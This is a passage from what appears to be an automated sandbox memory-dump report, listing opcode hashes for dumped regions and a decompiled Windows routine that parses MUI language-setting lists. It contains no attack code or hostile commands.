                                  • Opcode Fuzzy Hash: b1bf18d57505eb825740051dd8bb016d40b7860fd4b4a4fcac00b0647f0f7465
                                  • Instruction Fuzzy Hash: A3B09233B152080ADA205C4CB8412B4F3ACEB47325F2123A7EC08A72006186E4620688
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                  • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                  • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                  • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                  • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                  • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                  • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                  • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                  • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                  • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                  • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                  • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                  • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                  • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                  • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                  • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                  • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                  • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                  • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E025B8788(signed int __ecx, void* __edx, signed int _a4) {
                                  				signed int _v8;
                                  				short* _v12;
                                  				void* _v16;
                                  				signed int _v20;
                                  				char _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				char _v36;
                                  				signed int _v40;
                                  				char _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				char _v68;
                                  				void* _t216;
                                  				intOrPtr _t231;
                                  				short* _t235;
                                  				intOrPtr _t257;
                                  				short* _t261;
                                  				intOrPtr _t284;
                                  				intOrPtr _t288;
                                  				void* _t314;
                                  				signed int _t318;
                                  				short* _t319;
                                  				intOrPtr _t321;
                                  				void* _t328;
                                  				void* _t329;
                                  				char* _t332;
                                  				signed int _t333;
                                  				signed int* _t334;
                                  				void* _t335;
                                  				void* _t338;
                                  				void* _t339;
                                  
                                  				_t328 = __edx;
                                  				_t322 = __ecx;
                                  				_t318 = 0;
                                  				_t334 = _a4;
                                  				_v8 = 0;
                                  				_v28 = 0;
                                  				_v48 = 0;
                                  				_v20 = 0;
                                  				_v40 = 0;
                                  				_v32 = 0;
                                  				_v52 = 0;
                                  				if(_t334 == 0) {
                                  					_t329 = 0xc000000d;
                                  					L49:
                                  					_t334[0x11] = _v56;
                                  					 *_t334 =  *_t334 | 0x00000800;
                                  					_t334[0x12] = _v60;
                                  					_t334[0x13] = _v28;
                                  					_t334[0x17] = _v20;
                                  					_t334[0x16] = _v48;
                                  					_t334[0x18] = _v40;
                                  					_t334[0x14] = _v32;
                                  					_t334[0x15] = _v52;
                                  					return _t329;
                                  				}
                                  				_v56 = 0;
                                  				if(E025B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                  					_v56 = 1;
                                  					if(_v8 != 0) {
                                  						_t207 = E0259E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                  					}
                                  					_push(1);
                                  					_v8 = _t318;
                                  					E025B718A(_t207);
                                  					_t335 = _t335 + 4;
                                  				}
                                  				_v60 = _v60 | 0xffffffff;
                                  				if(E025B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                  					_t333 =  *_v8;
                                  					_v60 = _t333;
                                  					_t314 = E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                  					_push(_t333);
                                  					_v8 = _t318;
                                  					E025B718A(_t314);
                                  					_t335 = _t335 + 4;
                                  				}
                                  				_t216 = E025B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                  				_t332 = ";";
                                  				if(_t216 < 0) {
                                  					L17:
                                  					if(E025B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                  						L30:
                                  						if(E025B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                  							L46:
                                  							_t329 = 0;
                                  							L47:
                                  							if(_v8 != _t318) {
                                  								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                  							}
                                  							if(_v28 != _t318) {
                                  								if(_v20 != _t318) {
                                  									E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                  									_v20 = _t318;
                                  									_v40 = _t318;
                                  								}
                                  							}
                                  							goto L49;
                                  						}
                                  						_t231 = _v24;
                                  						_t322 = _t231 + 4;
                                  						_push(_t231);
                                  						_v52 = _t322;
                                  						E025B718A(_t231);
                                  						if(_t322 == _t318) {
                                  							_v32 = _t318;
                                  						} else {
                                  							_v32 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                  						}
                                  						if(_v32 == _t318) {
                                  							_v52 = _t318;
                                  							L58:
                                  							_t329 = 0xc0000017;
                                  							goto L47;
                                  						} else {
                                  							E02592340(_v32, _v8, _v24);
                                  							_v16 = _v32;
                                  							_a4 = _t318;
                                  							_t235 = E025AE679(_v32, _t332);
                                  							while(1) {
                                  								_t319 = _t235;
                                  								if(_t319 == 0) {
                                  									break;
                                  								}
                                  								 *_t319 = 0;
                                  								_t321 = _t319 + 2;
                                  								E0259E2A8(_t322,  &_v68, _v16);
                                  								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                  									_a4 = _a4 + 1;
                                  								}
                                  								_v16 = _t321;
                                  								_t235 = E025AE679(_t321, _t332);
                                  								_pop(_t322);
                                  							}
                                  							_t236 = _v16;
                                  							if( *_v16 != _t319) {
                                  								E0259E2A8(_t322,  &_v68, _t236);
                                  								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                  									_a4 = _a4 + 1;
                                  								}
                                  							}
                                  							if(_a4 == 0) {
                                  								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                  								_v52 = _v52 & 0x00000000;
                                  								_v32 = _v32 & 0x00000000;
                                  							}
                                  							if(_v8 != 0) {
                                  								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                  							}
                                  							_v8 = _v8 & 0x00000000;
                                  							_t318 = 0;
                                  							goto L46;
                                  						}
                                  					}
                                  					_t257 = _v24;
                                  					_t322 = _t257 + 4;
                                  					_push(_t257);
                                  					_v40 = _t322;
                                  					E025B718A(_t257);
                                  					_t338 = _t335 + 4;
                                  					if(_t322 == _t318) {
                                  						_v20 = _t318;
                                  					} else {
                                  						_v20 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                  					}
                                  					if(_v20 == _t318) {
                                  						_v40 = _t318;
                                  						goto L58;
                                  					} else {
                                  						E02592340(_v20, _v8, _v24);
                                  						_v16 = _v20;
                                  						_a4 = _t318;
                                  						_t261 = E025AE679(_v20, _t332);
                                  						_t335 = _t338 + 0x14;
                                  						while(1) {
                                  							_v12 = _t261;
                                  							if(_t261 == _t318) {
                                  								break;
                                  							}
                                  							_v12 = _v12 + 2;
                                  							 *_v12 = 0;
                                  							E0259E2A8(_v12,  &_v68, _v16);
                                  							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                  								_a4 = _a4 + 1;
                                  							}
                                  							_v16 = _v12;
                                  							_t261 = E025AE679(_v12, _t332);
                                  							_pop(_t322);
                                  						}
                                  						_t269 = _v16;
                                  						if( *_v16 != _t318) {
                                  							E0259E2A8(_t322,  &_v68, _t269);
                                  							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                  								_a4 = _a4 + 1;
                                  							}
                                  						}
                                  						if(_a4 == _t318) {
                                  							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                  							_v40 = _t318;
                                  							_v20 = _t318;
                                  						}
                                  						if(_v8 != _t318) {
                                  							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                  						}
                                  						_v8 = _t318;
                                  						goto L30;
                                  					}
                                  				}
                                  				_t284 = _v24;
                                  				_t322 = _t284 + 4;
                                  				_push(_t284);
                                  				_v48 = _t322;
                                  				E025B718A(_t284);
                                  				_t339 = _t335 + 4;
                                  				if(_t322 == _t318) {
                                  					_v28 = _t318;
                                  				} else {
                                  					_v28 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                  				}
                                  				if(_v28 == _t318) {
                                  					_v48 = _t318;
                                  					goto L58;
                                  				} else {
                                  					E02592340(_v28, _v8, _v24);
                                  					_v16 = _v28;
                                  					_a4 = _t318;
                                  					_t288 = E025AE679(_v28, _t332);
                                  					_t335 = _t339 + 0x14;
                                  					while(1) {
                                  						_v12 = _t288;
                                  						if(_t288 == _t318) {
                                  							break;
                                  						}
                                  						_v12 = _v12 + 2;
                                  						 *_v12 = 0;
                                  						E0259E2A8(_v12,  &_v68, _v16);
